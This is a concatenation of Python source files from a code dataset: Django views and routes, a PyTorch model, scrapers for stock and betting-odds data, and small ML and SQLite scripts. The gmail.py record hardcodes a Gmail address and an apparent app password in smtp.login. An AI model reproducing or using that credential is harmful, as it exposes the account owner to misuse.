RuaBairroCidade(cep.dadosEndereco['logradouro'])\n bairro = RuaBairroCidade(cep.dadosEndereco['bairro'])\n cidade = RuaBairroCidade(cep.dadosEndereco['localidade'])\n estado = Estado(cep.dadosEndereco['uf'])\n else:\n rua = RuaBairroCidade(request.POST.get('rua'))\n bairro = RuaBairroCidade(request.POST.get('bairro'))\n cidade = RuaBairroCidade(request.POST.get('cidade'))\n estado = Estado(request.POST.get('estado'))\n\n#########################################################################################################\n# monsta a variavel para levar os dados de volta para tela, caso #\n# algum dado tenha erro #\n#########################################################################################################\n\n variavel = Variavel({'nomeEstabelecimento':nomeEstabelecimento,\n 'cnpj':cnpj,\n 'tipoEstabelecimento':tipoEstabelecimento,\n 'cep':cep,\n 'rua':rua,\n 'numero':numero,\n 'bairro': bairro,\n 'cidade':cidade,\n 'estado':estado,\n 'complemento': complemento})\n\n setSessionVariavel(request, variavel)\n\n#########################################################################################################\n# monsta o objeto estabelecimento e o salva #\n# e coloca o cadastro como completo #\n#########################################################################################################\n\n if variavel.valida():\n\n cadastroEstabelecimento = Estabelecimento(dono= request.user,\n nome = nomeEstabelecimento.valor,\n cnpj = cnpj.valor,\n cep = cep.valor,\n estado = estado.valor,\n cidade = cidade.valor,\n bairro = bairro.valor,\n rua = rua.valor,\n numero = numero.valor,\n complemento = complemento.valor,\n tipo = TipoEstabelecimento.objects.get(id = tipoEstabelecimento.valor))\n try:\n cadastroEstabelecimento.save()\n cadastro = getCadastro(request)\n\n cadastro.cadastroCompleto = True\n cadastro.save()\n\n except IntegrityError:\n message.erro(request, Text().ja_cadastrado(\"CNPJ\"))\n return HttpResponseRedirect(reverse('CADASTRAR_ESTABELECIMENTO'))\n except:\n message.erro(request, Text().erro_comunicacao_banco_dados())\n return HttpResponseRedirect(reverse('CADASTRAR_ESTABELECIMENTO'))\n\n#########################################################################################################\n# deleta os dados da variável, pois se o estabelecimento foi salvo, #\n# não existem erros e a tela de cadastro de estabeleicmento não será #\n# recarregada #\n#########################################################################################################\n\n del request.session['variavel']\n cadastro = getCadastro(request)\n\n#########################################################################################################\n# monta o objeto usuário. Esse objeto é o que guarda dados do usuário, #\n# mas no tem nada a ver com o objeto user, que é utilizado para fazer login no sistema # #\n#########################################################################################################\n #cria o usuário padrão do sistema para conseguir salvar o dono no banco de dados\n cargo = C_Cargo(Cargo(), Text().padrao())\n cargo.save(request)\n usuario = Usuario(usuario = cadastro.usuario,\n email = cadastro.email,\n estabelecimento = cadastroEstabelecimento,\n telefone = cadastro.telefone,\n celular = cadastro.celular,\n cpf = cadastro.cpf,\n dono = True,\n cargo = cargo.objeto\n )\n try:\n usuario.save()\n except Exception as e:\n teste = e.message\n message.erro(request, Text().erro_comunicacao_banco_dados())\n return HttpResponseRedirect(reverse('SISTEMA_PRINCIPAL'))\n\n#########################################################################################################\n# dá todas as permissões ao usuário que cadastrou o estabelecimento no sistema #\n#########################################################################################################\n\n modelos = django.apps.apps.get_models()\n user = User.objects.get(id = usuario.usuario.id)\n for modelo in modelos:\n try:\n permissoesCadastradas = modelo._meta.original_attrs['permissions']\n\n\n for permissao in permissoesCadastradas:\n objetoPermissao = Permission.objects.get(codename = permissao[0])\n user.user_permissions.add(objetoPermissao)\n except Exception as e:\n pass\n\n#########################################################################################################\n# retorna para a tela principal do sistema #\n#########################################################################################################\n\n message.mensagem(request, Text().cadastro_completo())\n return HttpResponseRedirect(reverse('SISTEMA_PRINCIPAL'))\n\n else:\n message.erro(request, Text().dados_inconsistentes())\n return HttpResponseRedirect(reverse('CADASTRAR_ESTABELECIMENTO'))\n\n\n\n\n\n","sub_path":"DeBar/views/cadastro.py","file_name":"cadastro.py","file_ext":"py","file_size_in_byte":25939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"35210571","text":"import numpy\nfrom dynamic_stage import Stage\n\ndef pv_cost(quantity, years_in_future):\n\t\"\"\"\n\t\tSo far just the quantity-based cost\n\t:param quantity:\n\t:param years_in_future:\n\t:return:\n\t\"\"\"\n\tcost = 100000*pow(quantity, 0.8)\n\tpv_cost = cost/pow((1+0.05), years_in_future)\n\treturn pv_cost\n\ndef run_problem2(num_years, needed_trucks=4, required=(0,1,1,2,2,2)):\n\tmatrix = [[0 for val in range(num_years)] for val in range(needed_trucks+1)]\n\n\t# make the initialization cost matrix\n\tfor year in range(num_years):\n\t\tfor index, row in enumerate(matrix):\n\t\t\t#if index >= required[year]:\n\t\t\t#\tneeded_now = index - required[year]\n\t\t\tmatrix[index][year] = pv_cost(index, year)\n\n\tmatrix_array = numpy.array(matrix) # make it a numpy array so we can easily take a vertical slice\n\n\tstages = []\n\tfor year in range(num_years):\n\t\tcost_list = matrix_array[1:, year] # pull the column out of the matrix corresponding to this year - remove the 0 value first row (should look into how this is getting there)\n\t\tyear_stage = Stage(name=\"Year {}\".format(year), cost_benefit_list=list(cost_list), calculation_function=min, selection_constraints=required)\n\t\tyear_stage.max_selections = needed_trucks\n\t\tyear_stage.number = year\n\t\tstages.append(year_stage)\n\n\tfor index, stage in enumerate(stages): # make the relationships now\n\t\tif index > 0:\n\t\t\tstages[index].previous = stages[index-1]\n\t\tif index+1 < len(stages): # if it's not the last one\n\t\t\tstages[index].next = stages[index+1]\n\n\tstages[-1].optimize()\n\tstages[0].get_optimal_values()\n\n\nrun_problem2(num_years=6)\n\n","sub_path":"p2_dynamic.py","file_name":"p2_dynamic.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429731844","text":"\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\ncontent = MIMEMultipart() #建立MIMEMultipart物件\ncontent[\"subject\"] = \"Python send-mail by Edison\" #郵件標題\ncontent[\"from\"] = \"edison3.lin@gmail.com\" #寄件者\ncontent[\"to\"] = \"b82506001@gmail.com\" #收件者\ncontent.attach(MIMEText(\"Demo python send email\")) #郵件內容\n\n\nimport smtplib\nwith smtplib.SMTP(host=\"smtp.gmail.com\", port=\"587\") as smtp: # 設定SMTP伺服器\n try:\n smtp.ehlo() # 驗證SMTP伺服器\n smtp.starttls() # 建立加密傳輸\n smtp.login(\"edison3.lin@gmail.com\", \"nhgw qgvw aszm fdmd\") # 登入寄件者gmail\n smtp.send_message(content) # 寄送郵件\n print(\"Complete!\")\n except Exception as e:\n print(\"Error message: \", e)\n","sub_path":"gmail.py","file_name":"gmail.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49871422","text":"from django.urls import path\nfrom . import views\n\napp_name='mainblog'\n\nurlpatterns = [\n path('home/', views.home_view, name='home'),\n path('login/', views.login_view, name='login'),\n path('signup/', views.signup_view, name='signup'),\n path('menu/', views.menu_view, name='menu'),\n path('menu/cliente', views.client_view, name='clients'),\n path('menu/proveedor', views.provider_view, name='providers'),\n path('menu/clientes', views.clientes_view, name=\"allclients\"),\n path('producto/anadir', views.create_prod, name=\"createprod\"),\n path('menu/proveedores', views.proveedores_view, name=\"allproviders\"),\n]","sub_path":"mainblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267014045","text":"import torchvision.models as models\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport torch.nn.init\nimport torch.nn.functional as F\nfrom collections import OrderedDict\n\n\"\"\"Layers model in which output layers are tranformed to same dimension with a weight matrix instead of padding\"\"\"\nclass LayersModelSame(nn.Module):\n def __init__(self, img_dim=4096, embed_size=1024, trained_dresses=False, checkpoint_path=None):\n super(LayersModelSame, self).__init__()\n net = models.alexnet(pretrained=True)\n if trained_dresses:\n print(\"Loading pretrained model on dresses\")\n checkpoint = torch.load(checkpoint_path)\n weights = checkpoint[\"model\"]\n del weights['classifier.6.weight']\n del weights['classifier.6.bias']\n net.load_state_dict(checkpoint[\"model\"], strict=False)\n\n self.relu = nn.ReLU(inplace=False)\n self.a = net.features[0]\n self.b = net.features[2]\n self.c = net.features[3]\n self.d = net.features[5]\n self.e = net.features[6] #\n self.f = net.features[8] #\n self.g = net.features[10] #\n self.h = net.features[12] #\n self.i = net.avgpool #\n self.j = net.classifier[0]\n self.k = net.classifier[1] #\n self.l = net.classifier[3]\n self.m = net.classifier[4] #\n self.fc1 = nn.Linear(192, embed_size)\n self.fc2= nn.Linear(384, embed_size)\n self.fc3 = nn.Linear(256, embed_size)\n self.fc4 = nn.Linear(256, embed_size)\n self.fc5 = nn.Linear(256, embed_size)\n self.fc6 = nn.Linear(img_dim, embed_size)\n self.fc7 = nn.Linear(img_dim, embed_size)\n self.fc = nn.Linear(img_dim, embed_size)\n\n self.init_weights()\n\n def forward(self, x):\n\n batch = x.shape[0]\n temp = []\n x = self.a(x)\n x = self.relu(x)\n x = self.b(x)\n x = self.c(x)\n\n y = flat(x)\n y = self.fc1(y)\n temp.append(y)\n\n x = self.relu(x)\n x = self.d(x)\n x = self.e(x) #\n\n y = flat(x)\n y = self.fc2(y)\n temp.append(y)\n\n x = self.relu(x)\n x = self.f(x) #\n\n y = flat(x)\n y = self.fc3(y)\n temp.append(y)\n\n x = self.relu(x)\n x = self.g(x) #\n\n y = flat(x)\n y = self.fc4(y)\n temp.append(y)\n\n x = self.relu(x)\n x = self.h(x) #\n\n y = flat(x)\n y = self.fc5(y)\n temp.append(y)\n\n x = self.i(x)\n x = self.j(x)\n x = x.view(batch ,-1)\n x = self.k(x) #\n y = self.fc6(x)\n temp.append(y)\n\n x = self.relu(x)\n x = self.l(x)\n x = self.m(x) #\n y = self.fc7(x)\n temp.append(y)\n\n features = torch.stack(temp, dim=0).permute(1,0,2)\n\n return features\n\n\n def init_weights(self):\n \"\"\"Xavier initialization for the fully connected layer\n \"\"\"\n r = np.sqrt(6.) / np.sqrt(self.fc.in_features +\n self.fc.out_features)\n self.fc.weight.data.uniform_(-r, r)\n self.fc.bias.data.fill_(0)\n\n def load_state_dict(self, state_dict):\n \"\"\"Copies parameters. overwritting the default one to\n accept state_dict from Full model\n \"\"\"\n own_state = self.state_dict()\n new_state = OrderedDict()\n for name, param in state_dict.items():\n if name in own_state:\n new_state[name] = param\n\n super(LayersModelSame, self).load_state_dict(new_state)\n\ndef flat(x):\n batch = x.shape[0]\n n_channel = x.shape[1]\n dim = x.shape[2]\n pool = nn.AvgPool2d((dim, dim))\n # pool = nn.MaxPool2d((dim, dim))\n x = pool(x)\n x = x.view(batch, -1)\n return x\n","sub_path":"comb/util/layers_model_same.py","file_name":"layers_model_same.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601405662","text":"import lxml.html\nimport openpyxl as xl\nimport requests\nimport datetime\nimport pandas_datareader.data as web\nimport os\nfrom yahoo import YahooStats\nfrom tqdm import trange as timer\nimport tqdm\nfrom openpyxl.styles import PatternFill\nimport xlrd\nfrom openpyxl.workbook import Workbook\n\ndef cvt_xls_to_xlsx(src_file_path, dst_file_path):\n book_xls = xlrd.open_workbook(src_file_path)\n book_xlsx = Workbook()\n\n sheet_names = book_xls.sheet_names()\n for sheet_index, sheet_name in enumerate(sheet_names):\n sheet_xls = book_xls.sheet_by_name(sheet_name)\n if sheet_index == 0:\n sheet_xlsx = book_xlsx.active\n sheet_xlsx.title = sheet_name\n else:\n sheet_xlsx = book_xlsx.create_sheet(title=sheet_name)\n\n for row in range(0, sheet_xls.nrows):\n for col in range(0, sheet_xls.ncols):\n sheet_xlsx.cell(row = row+1 , column = col+1).value = sheet_xls.cell_value(row, col)\n\n book_xlsx.save(dst_file_path)\n\n# if os.path.exists('StockScreen.xls') == True:\ncvt_xls_to_xlsx('StockScreen.xls', 'StockScreen.xlsx')\nwb = xl.load_workbook('StockScreen.xlsx')\nsheet = wb.active\n\nrows = list(range(4, 24)) + list(range(26, 30)) + list(range(32, 38)) + list(range(40, 51))\nfor i in tqdm.tqdm(list(range(4, 24)) + list(range(26, 30)) + list(range(32, 38)) + list(range(40, 51)), desc='Processing'):\n tick = sheet['B' + str(i)].value\n\n stock = tick.split('.')\n if len(stock) > 1:\n stock = tick.split('.')[0] + '-' + tick.split('.')[1]\n data = web.DataReader(stock.upper(), 'yahoo', str(sheet['C3'].value), str(sheet['D3'].value))\n titles, values = YahooStats(stock)\n else:\n data = web.DataReader(tick.upper(), 'yahoo', str(sheet['C3'].value), str(sheet['D3'].value))\n titles, values = YahooStats(tick)\n\n sheet['C' + str(i)] = data.Close[0]\n sheet['D' + str(i)] = data.Close[len(data.Close) - 1]\n\n #WRITES 52-WEEK HIGH\n # sheet['C' + str(i)] = values[5][values[5].index('-') + 2:]\n\n\n\n #WRITES % DD\n if i >= 6:\n url = \"https://in.finance.yahoo.com/quote/\" + tick.upper()\n doc = lxml.html.fromstring(requests.get(url).content)\n right_summary = doc.xpath('//div[@data-test=\"right-summary-table\"]')[0]\n row = right_summary.xpath('.//td[@class=\"C($primaryColor) W(51%)\"]')[5]\n\n if 'yield' in row.xpath('.//span/text()')[0]:\n sheet['F' + str(i)] = values[13][values[13].index('(') + 1: len(values[13]) - 1]\n else:\n sheet['F' + str(i)] = 'N/A'\n\n #WRITES PUT/CALL\n if i >= 6:\n url = 'https://www.alphaquery.com/stock/' + str(tick.upper()) + '/volatility-option-statistics/30-day/put-call-ratio-volume'\n doc = lxml.html.fromstring(requests.get(url).content)\n below_chart = doc.xpath('//div[@id=\"below-chart-text\"]')[0]\n sheet['I' + str(i)] = below_chart.xpath('.//strong/text()')[0]\n\n # WRITES PREVIOUS CLOSE\n sheet['E' + str(i)] = values[0]\n\n #WRITES CURRENT PE\n if i >= 6:\n sheet['K' + str(i)] = values[10]\n\n # Writes ROIC\n if i >= 6:\n url = 'https://www.gurufocus.com/term/ROIC/' + str(tick.upper()) + '/ROIC-Percentage/'\n doc = lxml.html.fromstring(requests.get(url).content)\n header = doc.xpath('//div[@id=\"def_body_detail_height\"]')[0]\n sheet['L' + str(i)] = header.xpath('.//font/text()')[0].split(' ')[1]\n\n\nsheet['C2'] = datetime.datetime.today().strftime('%e-%b-%y')\nhighlight = PatternFill(start_color='FAF60C', end_color='FAF60C', fill_type='solid')\nsheet['B2'].fill, sheet['E3'].fill, sheet['I3'].fill, sheet['K3'].fill, sheet['L3'].fill = highlight, highlight, highlight, \\\n highlight, highlight\n\n\n\nwb.save('StockScreen.xlsx')","sub_path":"stock-screen.py","file_name":"stock-screen.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223304924","text":"#Select statement , remove unicoe characters\n\nimport sqlite3\n\nwith sqlite3.connect(\"new.db\") as connection:\n\tc = connection.cursor()\n\n\t# use a for loop to interate through the database, priniting the results line by line\n\n\tc.execute(\"SELECT firstname, lastname from employees\")\n\t\n\trows = c.fetchall()\n\n\t#output the rows to the screen, row by row\n\n\tfor r in rows:\n\n\t\tprint(r[0], r[1])\n\n\n\n\n\n\t\t","sub_path":"05_sql.py","file_name":"05_sql.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"375857133","text":"import tensorflow as tf\nimport keras\n# import matplotlib.pyplot as plt\n\nclass myCallback(tf.keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs={}): # 在迭代结束时调用\n if(logs.get('loss')<0.4):\n print(\"\\nLoss is low so cancelling training!\")\n self.model.stop_training = True\n\ncallbacks = myCallback()\n\nmnist = keras.datasets.fashion_mnist\n(training_images, training_labels), (test_images, test_labels) = mnist.load_data()\n\n# 打印第0个样本的值\n# plt.imshow(training_images[0])\n# print(training_labels[0])\n# print(training_images[0])\n\ntraining_images = training_images/255.0\ntest_images = test_images/255.0\n\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(28,28)), #每个图片的像素是28x28\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(10,activation=tf.nn.softmax) #因为有10种衣物,所以应该得到的是他们各自发概论\n])\n\nmodel.compile(optimizer=tf.compat.v1.train.AdamOptimizer(),loss='sparse_categorical_crossentropy')\n\nmodel.fit(training_images,training_labels,epochs=5,callbacks=[callbacks])\n\nmodel.evaluate(test_images,test_labels)\n\n\n\n","sub_path":"Week 1/Fashion Mnist.py","file_name":"Fashion Mnist.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"196906205","text":"import tkinter as tk\nimport pandas as pd\nimport numpy as np\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport time\nimport lxml\n\ndef ball():\n option = webdriver.ChromeOptions()\n option.add_argument('headless')\n driver = webdriver.Chrome(chrome_options=option,executable_path='.\\chromedriver.exe')\n #driver = webdriver.PhantomJS()\n url ='http://bkd99.net/'\n driver.get(url)\n time.sleep(2)\n pageSource=driver.page_source\n soup = BeautifulSoup(pageSource,'xml')\n\n # Start to soup\n test = soup.findAll('div',{'usefor':'row'})\n col=['All_RA','All_RA_Odds','All_RB','All_RB_Odds','All_DA','All_DA_Odds','All_DB_Odds','Half_RA','Half_RA_Odds','Half_RB','Half_RB_Odds','Half_DA','Half_DA_Odds','Half_DB_Odds']\n df = pd.DataFrame(columns=col)\n\n\n for i in test:\n try: \n team =(i.find('div',{'class':'cell team'}).text)\n if str(team[0:3]) in str(team[3:]):break\n team=team[0:3]\n temp = i.find('div',{'class':'cell R'})\n temp2= i.find('div',{'class':'cell OU'})\n temp3= i.find('div',{'class':'cell HR_R'})\n temp4= i.find('div',{'class':'cell HR_OU'})\n df.loc[team,'All_RA'] =temp.find('div',{'class':'css0'}).get_text(strip=True)\n if '平' in df.loc[team,'All_RA']:df.loc[team,'All_RA']=df.loc[team,'All_RA'][0:-1]\n df.loc[team,'All_RA_Odds'] =temp.find('div',{'class':'css1'}).get_text(strip=True)\n df.loc[team,'All_RB'] =temp.find('div',{'class':'css2'}).get_text(strip=True)\n if '平' in df.loc[team,'All_RB']:df.loc[team,'All_RB']=df.loc[team,'All_RB'][0:-1]\n df.loc[team,'All_RB_Odds'] =temp.find('div',{'class':'css3'}).get_text(strip=True)\n df.loc[team,'All_DA'] =temp2.find('div',{'class':'css0'}).get_text(strip=True)\n df.loc[team,'All_DA_Odds'] =temp2.find('div',{'class':'css1'}).get_text(strip=True)[1:]\n df.loc[team,'All_DB_Odds'] =temp2.find('div',{'class':'css3'}).get_text(strip=True)[1:]\n df.loc[team,'Half_RA'] =temp3.find('div',{'class':'css0'}).get_text(strip=True)\n if '平' in df.loc[team,'Half_RA']:df.loc[team,'Half_RA']=df.loc[team,'Half_RA'][0:-1]\n df.loc[team,'Half_RA_Odds'] =temp3.find('div',{'class':'css1'}).get_text(strip=True)\n df.loc[team,'Half_RB'] =temp3.find('div',{'class':'css2'}).get_text(strip=True)\n if '平' in df.loc[team,'Half_RB']:df.loc[team,'Half_RB']=df.loc[team,'Half_RB'][0:-1]\n df.loc[team,'Half_RB_Odds'] =temp3.find('div',{'class':'css3'}).get_text(strip=True)\n df.loc[team,'Half_DA'] =temp4.find('div',{'class':'css0'}).get_text(strip=True)\n df.loc[team,'Half_DA_Odds'] =temp4.find('div',{'class':'css1'}).get_text(strip=True)[1:]\n df.loc[team,'Half_DB_Odds'] =temp4.find('div',{'class':'css3'}).get_text(strip=True)[1:]\n except:continue\n\n df=df.sort_index()\n driver.close()\n df=df.replace('',np.nan)\n return df\ndef nine(line):\n line = line.split()\n date = line[0]\n\n matrix=[]\n j=-1\n for i in range(len(line)):\n if line[i]==date:\n matrix.append([])\n j+=1\n matrix[j].append(line[i])\n\n new=[]\n for i in range(len(matrix)):\n k=-10\n m=-10\n new.append([])\n for j in range(len(matrix[i])):\n if str(matrix[i][j])=='大':\n k=0\n if '單' in str(matrix[i][j]):\n m=3\n k=-10\n if j>2 and k<4 :\n if m>1:\n m-=1\n continue\n if '響尾蛇' in matrix[i][j]:matrix[i][j]='ARI'\n elif '馬林魚' in matrix[i][j]:matrix[i][j]='MIA'\n elif '小熊' in matrix[i][j]:matrix[i][j]='CHC'\n elif '道奇' in matrix[i][j]:matrix[i][j]='LAD'\n elif '落磯山' in matrix[i][j]:matrix[i][j]='COL'\n elif '舊金山巨人' in matrix[i][j]:matrix[i][j]='SFO'\n elif '華盛頓國民' in matrix[i][j]:matrix[i][j]='WSH'\n elif '費城人' in matrix[i][j]:matrix[i][j]='PHI'\n elif '釀酒人' in matrix[i][j]:matrix[i][j]='MIL'\n elif '紅人' in matrix[i][j]:matrix[i][j]='CIN'\n elif '老虎' in matrix[i][j]:matrix[i][j]='DET'\n elif '運動家' in matrix[i][j]:matrix[i][j]='OAK'\n elif '雙城' in matrix[i][j]:matrix[i][j]='MIN'\n elif '白襪' in matrix[i][j]:matrix[i][j]='CWS'\n elif '水手' in matrix[i][j]:matrix[i][j]='SEA'\n elif '金鶯' in matrix[i][j]:matrix[i][j]='BAL'\n elif '洛杉磯天使' in matrix[i][j]:matrix[i][j]='LAA'\n elif '紅襪' in matrix[i][j]:matrix[i][j]='BOS'\n elif '太空人' in matrix[i][j]:matrix[i][j]='HOU'\n elif '光芒' in matrix[i][j]:matrix[i][j]='TAM'\n elif '洋基' in matrix[i][j]:matrix[i][j]='NYY'\n elif '皇家' in matrix[i][j]:matrix[i][j]='KAN'\n elif '海盜' in matrix[i][j]:matrix[i][j]='PIT'\n elif '遊騎兵' in matrix[i][j]:matrix[i][j]='TEX'\n elif '教士' in matrix[i][j]:matrix[i][j]='SDG'\n elif '紅雀' in matrix[i][j]:matrix[i][j]='STL'\n elif '勇士' in matrix[i][j]:matrix[i][j]='ATL'\n elif '藍鳥' in matrix[i][j]:matrix[i][j]='TOR'\n elif '印地安人' in matrix[i][j]:matrix[i][j]='CLE'\n elif '大都會' in matrix[i][j]:matrix[i][j]='NYM'\n elif '廣島鯉魚' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '讀賣巨人' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '西武獅' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '東北樂天鷹' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '日本火腿' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '千葉羅德' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '養樂多燕子' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '中日龍' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n new[i].append(matrix[i][j])\n k+=1\n\n index=[]\n for i in range(len(new)):\n if (('+'in str(new[i][3]))or ('-' in str(new[i][3]))):new[i].insert(5,np.nan)\n elif len(new[i][3])!=5 : \n if new[i][3]=='0' or new[i][3]*9==0:new[i].insert(5,'0')\n else:new[i].insert(5,np.nan)\n else: \n if new[i][4]=='0' or new[i][4]*9==0:new[i].insert(3,'0')\n else:new[i].insert(3,np.nan)\n if ('+'in str(new[i][12]) or '-'in str(new[i][12]) ):new[i].insert(14,np.nan)\n elif len(new[i][12])!=5 :\n if new[i][12]=='0' or new[i][12]*9==0:new[i].insert(14,'0')\n else:new[i].insert(14,np.nan)\n else: \n if new[i][13]=='0' or new[i][13]*9==0:new[i].insert(12,'0')\n else:new[i].insert(12,np.nan)\n index.append(new[i][0])\n \n \n\n df = pd.DataFrame(new,index=index)\n df.drop(df.columns[2],axis=1,inplace=True)\n df.drop(df.columns[20:],axis=1,inplace=True)\n\n\n df=df.sort_index()\n\n\n\n df.columns=['Team_A','Team_B','All_RA','All_RA_Odds','All_RB','All_RB_Odds','All_DA','ABig','All_DA_Odds','ASmall','All_DB_Odds','Half_RA','Half_RA_Odds','Half_RB','Half_RB_Odds','Half_DA','HBig','Half_DA_Odds','HSmall','Half_DB_Odds']\n df=df.drop(['ASmall','HSmall','Team_A','ABig','HBig','Team_B'],axis=1)\n\n return df\n\ndef cate(name,hole,oddsA,oddsB):\n if hole>=100:\n if float(oddsA)>=0.92 and float(oddsB)>=0.92:\n big.append(str(str(name)+' >100%'))\n end=1\n elif (float(oddsA)+float(oddsB))>=(1.97-0.002*float(hole)) and (float(oddsA)>=0.92) and (float(oddsB)>=0.92):\n if hole>=50:\n fifup.append((str(name)+str(hole)+'%'))\n end=1\n elif hole>=25:\n nor.append((str(name)+str(hole)+'%'))\n end=1\ndef judge_sign(name,a,odd_a,b,odd_b):\n if len(a)==1:a_0 =a[0]\n elif a[1] in ['0','1','2','3','4','5','6','7','8','9']:a_0 = a[0:2]\n else:a_0 =a[0]\n if len(b)==1:b_0 =b[0]\n elif b[1] in ['0','1','2','3','4','5','6','7','8','9']:b_0 = b[0:2]\n else:b_0 =b[0]\n if int(b_0)>int(a_0):\n temp = a\n a = b\n b = temp\n temp = a_0\n a_0 = b_0\n b_0 = temp\n oddtemp = odd_a\n odd_a = odd_b\n odd_b = oddtemp\n if int(b_0)-int(a_0)>1:cate(name,200,odd_a,odd_b)\n if a_0 == b_0:\n if a_0=='0' and 'All' in name :end=1\n if '+' in a :\n a=int(a.split('+')[1])\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,abs(a-b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,abs(a+b),odd_a,odd_b)\n elif '.' in b:cate(name,100+a,odd_a,odd_b)\n elif a_0 == b:cate(name,a,odd_a,odd_b)\n else:err_list.append(str(name+'judge_sign'))\n elif '-' in a :\n a=int(a.split('-')[1])\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,abs(a+b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,abs(a-b),odd_a,odd_b)\n elif '.' in b:cate(name,100-a,odd_a,odd_b)\n elif a_0 == b:cate(name,a,odd_a,odd_b)\n else:err_list.append(str(name+'judge_sign'))\n elif '.' in a:\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,100+b,odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,100-b,odd_a,odd_b)\n elif a==b:end=1\n elif a_0==b:cate(name,100,odd_a,odd_b)\n else:err_list.append(str(name+'judge_sign'))\n elif a_0 == a:\n a=int(a)\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,b,odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,b,odd_a,odd_b)\n elif '.' in b:cate(name,100,odd_a,odd_b)\n elif a == int(b):end=1\n else:err_list.append(str(name+'judge_sign'))\n end=1\n elif a_0 != b_0:\n if a_0=='1':\n if '+' in a:\n a=int(a.split('+')[1])\n cate(name,100-a,odd_a,odd_b)\n elif '-' in a:\n a=int(a.split('-')[1])\n cate(name,100+a,odd_a,odd_b)\n elif a_0==a:cate(name,100,odd_a,odd_b)\n elif int(a_0)-int(b_0)<2:\n if '+' in a:\n a=int(a.split('+')[1])\n if '+' in b:\n b= int(b.split('+')[1])\n cate(name,100+b,odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,max((100-b),(100-a)),odd_a,odd_b)\n elif '.' in b:cate(name,100-a,odd_a,odd_b)\n elif b_0 == b:cate(name,100,odd_a,odd_b)\n elif '-' in a:\n a=int(a.split('-')[1])\n if '+' in b:\n b= int(b.split('+')[1])\n cate(name,max(100+a,100+b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,100+a,odd_a,odd_b)\n elif '.' in b:cate(name,100+a,odd_a,odd_b)\n elif '.' in a:\n if '+' in b:\n b= int(b.split('+')[1])\n cate(name,100+b,odd_a,odd_b)\n elif '-' in b:\n b= int(b.split('-')[1])\n cate(name,100-b,odd_a,odd_b)\n elif '.' in b:cate(name,200,odd_a,odd_b)\n elif b_0 == b:cate(name,200,odd_a,odd_b)\n elif a_0 == a:\n if '+' in b:\n b= int(b.split('+')[1])\n cate(name,100+b,odd_a,odd_b)\n elif '-' in b:\n b= int(b.split('-')[1])\n cate(name,100-b,odd_a,odd_b)\n elif '.' in b:cate(name,100,odd_a,odd_b)\n elif b_0 == b:cate(name,100,odd_a,odd_b)\n else:err_list.append(str(name+'judge_sign'))\ndef hoor(name,a,ood_a,b,odd_b):\n if a[0]==b[0]:\n if '+' in a:\n a=int(a.split('+')[1])\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,max(100-a,100-b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,max(100-a,100+b),odd_a,odd_b)\n else:cate('*互*'+name,200,odd_a,odd_b)\n elif '-' in a:\n a=int(a.split('-')[1])\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,max(100+a,100-b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,max(100+a,100+b),odd_a,odd_b)\n else:cate('*互*'+name,200,odd_a,odd_b)\n else:cate('*互*'+name,200,odd_a,odd_b)\n else:cate('*互*'+name,200,odd_a,odd_b)\n end=1\ndef judge(name,list_n,list_b,game_set,side):\n name = name +' @ '+ game_set + '_'\n if side[2:] == 'same':\n if side[0] == '1':\n judge_sign(name,list_n[str(game_set+'A')],list_n[str(game_set+'A_Odds')],list_b[str(game_set+'A')],list_b[str(game_set+'A_Odds')])\n else:\n judge_sign(name,list_n[str(game_set+'B')],list_n[str(game_set+'B_Odds')],list_b[str(game_set+'B')],list_b[str(game_set+'B_Odds')])\n elif side[2:] == 'diff':\n if side[0] == '1':\n 